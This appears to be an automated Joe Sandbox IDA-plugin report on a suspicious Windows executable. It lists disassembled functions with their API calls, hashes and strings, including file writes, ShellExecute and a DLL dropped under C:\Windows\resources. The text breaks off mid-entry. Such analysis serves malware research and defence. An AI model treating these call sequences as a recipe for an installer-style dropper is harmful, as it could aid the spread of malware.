                                                                  • API String ID: 542301482-1930900407
                                                                  • Opcode ID: eb67aea980843a7017acfc17951cd482fde5a1829f11ebcb7b3e66b289fc0632
                                                                  • Instruction ID: 980c83093501945f33440b76d7cafb195365f9a7aefe91f5dd6c45d3bc957592
                                                                  • Opcode Fuzzy Hash: eb67aea980843a7017acfc17951cd482fde5a1829f11ebcb7b3e66b289fc0632
                                                                  • Instruction Fuzzy Hash: 77415C75A00104BFCB00DFA4CD88EAE7BB6EF88315B20456AF905EB2D1DA79ED41CB55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: !C$ !C
                                                                  • API String ID: 0-4112869800
                                                                  • Opcode ID: f244a69970be5e3fb7395b2eb28eccf6eedf7c5e0ffd2bc2360b4ba292bdf26c
                                                                  • Instruction ID: 9d59628195055c55702702634927743170e9131f895cfb3327bf2ff62f88c604
                                                                  • Opcode Fuzzy Hash: f244a69970be5e3fb7395b2eb28eccf6eedf7c5e0ffd2bc2360b4ba292bdf26c
                                                                  • Instruction Fuzzy Hash: F2C15971A0021ACBCF18CF68D5905EEB7B2BF98314F26826AD8567B380D7346952CF94
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: dcc129d6bac15f0bd9ab37cd77dafa9dab2e5e89b57295ac72d2f639f22196f4
                                                                  • Instruction ID: acf40542f5c489c1fe3f42b28250c4c8421c5faf7d3490952b38be557a9d2a1a
                                                                  • Opcode Fuzzy Hash: dcc129d6bac15f0bd9ab37cd77dafa9dab2e5e89b57295ac72d2f639f22196f4
                                                                  • Instruction Fuzzy Hash: BEF0B8B16002109BCB00EFA0CD489AEB378FF08324F20097AF101F30D0D6B899009B2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                  • Instruction ID: 831d3521bb97c66da2d66f325b0a06c49e3003946fd67b3772e4acd4ce90d7ab
                                                                  • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                  • Instruction Fuzzy Hash: DDE17B71900719DFDB24CF58C880BAAB7F5EB44305F15892EE897AB2D1D778A961CF04
                                                                  APIs
                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404221
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404235
                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404252
                                                                  • GetSysColor.USER32(?), ref: 00404263
                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404271
                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040427F
                                                                  • lstrlenW.KERNEL32(?), ref: 00404284
                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404291
                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004042A6
                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004042FF
                                                                  • SendMessageW.USER32(00000000), ref: 00404306
                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404331
                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404382
                                                                  • SetCursor.USER32(00000000), ref: 00404385
                                                                  • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 0040439A
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004043A6
                                                                  • SetCursor.USER32(00000000), ref: 004043A9
                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004043D8
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004043EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: @.C$N$open
                                                                  • API String ID: 3615053054-801394694
                                                                  • Opcode ID: 963217090c97da4adcbcf15c24e762bcbfd2aad3b5ef9f006c5e90e2b7288751
                                                                  • Instruction ID: bcd791c445e14c4d77ec78b24435c59c5d20c83db90324e08484bccd48c03535
                                                                  • Opcode Fuzzy Hash: 963217090c97da4adcbcf15c24e762bcbfd2aad3b5ef9f006c5e90e2b7288751
                                                                  • Instruction Fuzzy Hash: 727181B1A00209BFDB109F60DD85E6A7B79FB84355F04803AFB05B62D1C779A961CF98
                                                                  APIs
                                                                  • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C63,?,?,00000001,004057DB,?,00000000,000000F1,?), ref: 00405ACF
                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C63,?,?,00000001,004057DB,?,00000000,000000F1,?), ref: 00405AF3
                                                                  • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405AFC
                                                                    • Part of subcall function 00405972: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 00405982
                                                                    • Part of subcall function 00405972: lstrlenA.KERNEL32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059B4
                                                                  • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405B19
                                                                  • wsprintfA.USER32 ref: 00405B37
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B72
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B81
                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405BB9
                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00430498,00000000,-0000000A,0040A514,00000000,[Rename],00000000,00000000,00000000), ref: 00405C0F
                                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405C21
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405C28
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405C2F
                                                                    • Part of subcall function 00405A0D: GetFileAttributesW.KERNELBASE(00000003,00402DA7,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                    • Part of subcall function 00405A0D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                                  • API String ID: 1265525490-899692902
                                                                  • Opcode ID: 0a17e51cce6490609f0f77533b4495ec8614e759a42bed5fb578cd96ca66f47b
                                                                  • Instruction ID: 7e8ca1d3d50ba167f29b61b8a94756d2149cb8eb8d1ee9df404c58700b9860d6
                                                                  • Opcode Fuzzy Hash: 0a17e51cce6490609f0f77533b4495ec8614e759a42bed5fb578cd96ca66f47b
                                                                  • Instruction Fuzzy Hash: B1411671204B19BFD2206B615D49F6B3B6CEF45715F14003AF942B62D2EA7CE9018A7D
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                  • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                  • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                  • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                  APIs
                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 00406098
                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\yMXFgPOdf2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004060AC
                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,756F3420,004033E1), ref: 004060BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Char$Next$Prev
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 589700163-3568998188
                                                                  • Opcode ID: 5d64c10bc97e62ea4a676719e588da5fc07abd2ce6560c5e8650e212b13ecad1
                                                                  • Instruction ID: 35fbf6a24d661ac63574abd6f2b5f3cfaee5f5a3e28f3d5ffd4c7fbc13fd6fb5
                                                                  • Opcode Fuzzy Hash: 5d64c10bc97e62ea4a676719e588da5fc07abd2ce6560c5e8650e212b13ecad1
                                                                  • Instruction Fuzzy Hash: 1F11C81684061299DB30BB148C40A7772E8EF55754F56843FED86732C0E7BC4CA282BD
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040406A
                                                                  • GetSysColor.USER32(00000000), ref: 00404086
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404092
                                                                  • SetBkMode.GDI32(?,?), ref: 0040409E
                                                                  • GetSysColor.USER32(?), ref: 004040B1
                                                                  • SetBkColor.GDI32(?,?), ref: 004040C1
                                                                  • DeleteObject.GDI32(?), ref: 004040DB
                                                                  • CreateBrushIndirect.GDI32(?), ref: 004040E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                  • String ID:
                                                                  • API String ID: 2320649405-0
                                                                  • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                  • Instruction ID: 4290116d03e1e938411804169c88583f7df32a2dcd0dedbcf70a7ff5d4599883
                                                                  • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                  • Instruction Fuzzy Hash: 0F2157B15007049BC7319F68DD48B5B7BF8AF41714F04893DEA95F2691D734D948CB64
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
                                                                    • Part of subcall function 00405A90: ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031DB,00000000,00000000,00402FF3,000000FF,00000004,00000000,00000000,00000000), ref: 00405AA4
                                                                    • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                  • String ID: 9
                                                                  • API String ID: 1149667376-2366072709
                                                                  • Opcode ID: 1ebf7e8ea81d9f721691c6586ac75f819ca406a5e40d7b7a1c139251d0037f51
                                                                  • Instruction ID: 712a0fc01c11b6dc7c3c5e68f53f431dee7eef2fa5089cb8e9bfef1fdcaab261
                                                                  • Opcode Fuzzy Hash: 1ebf7e8ea81d9f721691c6586ac75f819ca406a5e40d7b7a1c139251d0037f51
                                                                  • Instruction Fuzzy Hash: A151EBB1D00219AADF14DFA4DA88AAEB779FF04304F50443BE501B62D0DB759E42CB69
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                  • String ID:
                                                                  • API String ID: 3294113728-0
                                                                  • Opcode ID: 92b666876386d525bd55a3880e5db59432ef194caa30a2c1e9ac3a4c6e417a2c
                                                                  • Instruction ID: fe2ca1a255c9cd407b5186cb59bdd4cc2173cf127eb101838ad91b4c2232832b
                                                                  • Opcode Fuzzy Hash: 92b666876386d525bd55a3880e5db59432ef194caa30a2c1e9ac3a4c6e417a2c
                                                                  • Instruction Fuzzy Hash: BD317F72800118BBDF11AFA5CE49DAF7E79EF09364F24423AF550762D0CA794E418BA9
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040B578,000000FF,C:\Windows\resources\0809\spaciousness\krjning.dll,00000400,?,?,00000021), ref: 0040252D
                                                                  • lstrlenA.KERNEL32(C:\Windows\resources\0809\spaciousness\krjning.dll,?,?,0040B578,000000FF,C:\Windows\resources\0809\spaciousness\krjning.dll,00000400,?,?,00000021), ref: 00402534
                                                                  • WriteFile.KERNEL32(00000000,?,C:\Windows\resources\0809\spaciousness\krjning.dll,00000000,?,?,00000000,00000011), ref: 00402566
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
